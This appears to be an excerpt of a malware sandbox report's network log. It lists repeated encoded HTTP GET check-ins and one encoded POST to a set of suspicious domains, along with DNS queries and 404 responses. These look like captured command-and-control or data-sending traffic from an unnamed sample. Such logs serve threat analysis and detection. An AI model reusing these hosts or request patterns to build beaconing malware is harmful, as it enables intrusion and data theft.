                Source: global trafficHTTP traffic detected: GET /cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM HTTP/1.1Host: www.futurevision.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM HTTP/1.1Host: www.dreampay.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wie9/?mRu=lL7P/0JUYVbqWckkUFA5AZs0yLHF2CZptxiRtFaWww2Jt1+4Ybj8qDPeqsoco5xM//SPE5hjfF332jPzZ07z97WSr/ctCPXD3Kda+wiI2ZiEZuGqb25QMsE=&UJ=7H1XM HTTP/1.1Host: www.jigg.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cbd3/?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM HTTP/1.1Host: www.econsultoria.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /zis1/?mRu=9Akn8HQ/w9IGHY5hfK3Sz2XWYTq6JbeGUZoZjuxeZl7qmmC+7O6Wru/gQUs9lGhVdHn4ksWgMiMPd3qmb+i3xZVXvSH4PNUsYgsF4Q6R4VB3b48Gv0g7yoc=&UJ=7H1XM HTTP/1.1Host: www.webworld.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /fid8/?mRu=TlJ1g/LEHcod8cWOxAq9FP73H09YVH7WgnCIHnyD26ULKZOEEsjMueNmMu+sImVaRLKPh0l5mf17vNoqkS6RVPulxmIy09RerMB73PEzvxMXDGvmWRP6LAE=&UJ=7H1XM HTTP/1.1Host: www.smartbuyoffer.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /lp9q/?mRu=Tgs0l5rQdINE0HmohrfgPmtVT9TM6mRmz28qlq5N+W6TIOOkclTpEHygPFllR64ZyPP4U6P7xjaKPMS0ZS1/tTAw9ro2DSZN0V3b+mDHt47uSUTeFI2WDZw=&UJ=7H1XM HTTP/1.1Host: www.makerpay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /yiph/?mRu=LkalMmDuboj4872empR9rFcNrijVZ/XXOKlfHTPEe/ophG0OElyabBCkCoxIRZ4fKVtkhMIDAwIoplbOZBCU2IJMHRXqXMq09ankZnsM2pers/hD+qKFjlc=&UJ=7H1XM HTTP/1.1Host: www.jiujiuxi.loveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /z4qw/?mRu=lw0Z9E/N2I/dpWlk8pTLJHRCZkuY3j9SfKchD5ao+gJdMbWwfo1urvInPerR2ecaSF54xdut+09OjjfToxgsYGp4jUJZlMustb83Phs9Oq/TesXOyzSulKc=&UJ=7H1XM HTTP/1.1Host: www.moneys.fitAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /x1pj/?mRu=rrUVFAplNZMcakJZOJE4CcqToYvowPkUAgJ/Lg0h4NOzPxri4UWPxE+iyT5MFYFQlY7+f2AMywjhKYvv2dkZ2pTnN7HLjvrDE8g/sgQAyuCfG8ldMNFJeds=&UJ=7H1XM HTTP/1.1Host: www.vnxoso88.artAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rzaq/?mRu=S7FCB2U3I5+MEOix97haLm8n4ZiU5s+sYyIa9Io4LXSLJStcMtKrD203LPev0YXMiZ/cleh4jZ/UsKrDR5eop/VU9oI7TN7VO3RaOL7GPdXsiE9kkN1XODc=&UJ=7H1XM HTTP/1.1Host: www.ebook.farmAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mk81/?mRu=gzc9tI9/iKFBs/CfQiHfQ1hmFq4huhxeMTnwpTnTnn57GmdDkYbUUImaMzeYKxMl89CL7o6kx1g4xig0s43SWJ3EiMJuN9y4NOM7gvWFzz5YCjlwg0gKJrc=&UJ=7H1XM HTTP/1.1Host: www.zz83x.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM HTTP/1.1Host: www.wukong.collegeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6yjb/?mRu=VYNzRxyQK7JD7ZohbYVagv51ruE2l0awbhfoJPQ4rqLtN/pKU1ruR3BE6r+8vb9gac3NpWXxvYS6rs+3SUr3GMlMxkDr3AnCXH8/Zbk4o49navQqKFljaLg=&UJ=7H1XM HTTP/1.1Host: www.qiusuo.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /h7d8/?mRu=6+VCk9pNPTQZYCZ6d4PN3EmbuLb87q5olpsVnOemsYlmrkAHkUX/D7H9eR5xtWpIZUSGBjAAXrZ9ZbWt4k2m/mELc90NwjhxnhDwTkUjNTY6s8tAYo2upp8=&UJ=7H1XM HTTP/1.1Host: www.pg874.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /xvf3/?mRu=WlBP6ZDj33sme071J7YmRt2meznD9lOMeO4smNCsOshEYDb+rkIOBjcGODqfewmlgMUUULEtW3alEv1cIqlE3oXaOj92B6nyIwOIgW4/F45i+leDgRmHhUA=&UJ=7H1XM HTTP/1.1Host: www.rimberiokitchen.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM HTTP/1.1Host: www.futurevision.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM HTTP/1.1Host: www.dreampay.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wie9/?mRu=lL7P/0JUYVbqWckkUFA5AZs0yLHF2CZptxiRtFaWww2Jt1+4Ybj8qDPeqsoco5xM//SPE5hjfF332jPzZ07z97WSr/ctCPXD3Kda+wiI2ZiEZuGqb25QMsE=&UJ=7H1XM HTTP/1.1Host: www.jigg.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cbd3/?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM HTTP/1.1Host: www.econsultoria.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.zz83x.top
                Source: global trafficDNS traffic detected: DNS query: www.wukong.college
                Source: global trafficDNS traffic detected: DNS query: www.qiusuo.vip
                Source: global trafficDNS traffic detected: DNS query: www.pg874.shop
                Source: global trafficDNS traffic detected: DNS query: www.rimberiokitchen.online
                Source: global trafficDNS traffic detected: DNS query: www.futurevision.life
                Source: global trafficDNS traffic detected: DNS query: www.dreampay.shop
                Source: global trafficDNS traffic detected: DNS query: www.jigg.space
                Source: global trafficDNS traffic detected: DNS query: www.econsultoria.online
                Source: global trafficDNS traffic detected: DNS query: www.webworld.digital
                Source: global trafficDNS traffic detected: DNS query: www.smartbuyoffer.online
                Source: global trafficDNS traffic detected: DNS query: www.makerpay.xyz
                Source: global trafficDNS traffic detected: DNS query: www.jiujiuxi.love
                Source: global trafficDNS traffic detected: DNS query: www.moneys.fit
                Source: global trafficDNS traffic detected: DNS query: www.vnxoso88.art
                Source: global trafficDNS traffic detected: DNS query: www.ebook.farm
                Source: unknownHTTP traffic detected: POST /4wc1/ HTTP/1.1Host: www.wukong.collegeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.wukong.collegeReferer: http://www.wukong.college/4wc1/Content-Type: application/x-www-form-urlencodedContent-Length: 200Connection: closeCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 42 62 68 4e 4d 50 31 41 4a 70 38 37 4c 76 77 48 35 55 39 4c 36 38 62 41 75 79 47 62 6a 78 4f 4e 4b 70 55 6b 73 75 75 59 43 37 58 49 6c 55 4c 48 35 64 50 39 75 4f 69 4c 47 2f 77 61 63 78 71 66 6f 36 74 47 54 50 77 4a 58 6a 4b 74 39 4d 46 51 4e 47 39 41 57 47 79 62 69 42 5a 44 44 48 6d 51 62 70 52 63 70 73 49 69 30 52 7a 4e 37 6b 5a 72 59 59 49 6e 37 37 36 51 34 2b 36 6c 41 6d 6b 4d 38 4f 74 62 4a 42 51 52 36 68 54 37 55 6c 4d 50 38 68 4c 34 70 58 67 6b 6a 2b 7a 68 78 6d 77 72 38 70 45 73 61 47 73 2b 73 76 45 41 4f 43 36 69 77 74 79 44 4c 77 3d 3d Data Ascii: mRu=7qP3g7pHYt35BbhNMP1AJp87LvwH5U9L68bAuyGbjxONKpUksuuYC7XIlULH5dP9uOiLG/wacxqfo6tGTPwJXjKt9MFQNG9AWGybiBZDDHmQbpRcpsIi0RzN7kZrYYIn776Q4+6lAmkM8OtbJBQR6hT7UlMP8hL4pXgkj+zhxmwr8pEsaGs+svEAOC6iwtyDLw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 14:29:49 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66f0ea70-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:30:06 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 178Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+|OX)@OG>Wr~b
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:30:09 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 178Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+|OX)@OG>Wr~b
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:30:12 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 178Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+|OX)@OG>Wr~b
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:30:14 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 34 77 63 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /4wc1/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:31:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:31:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:31:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
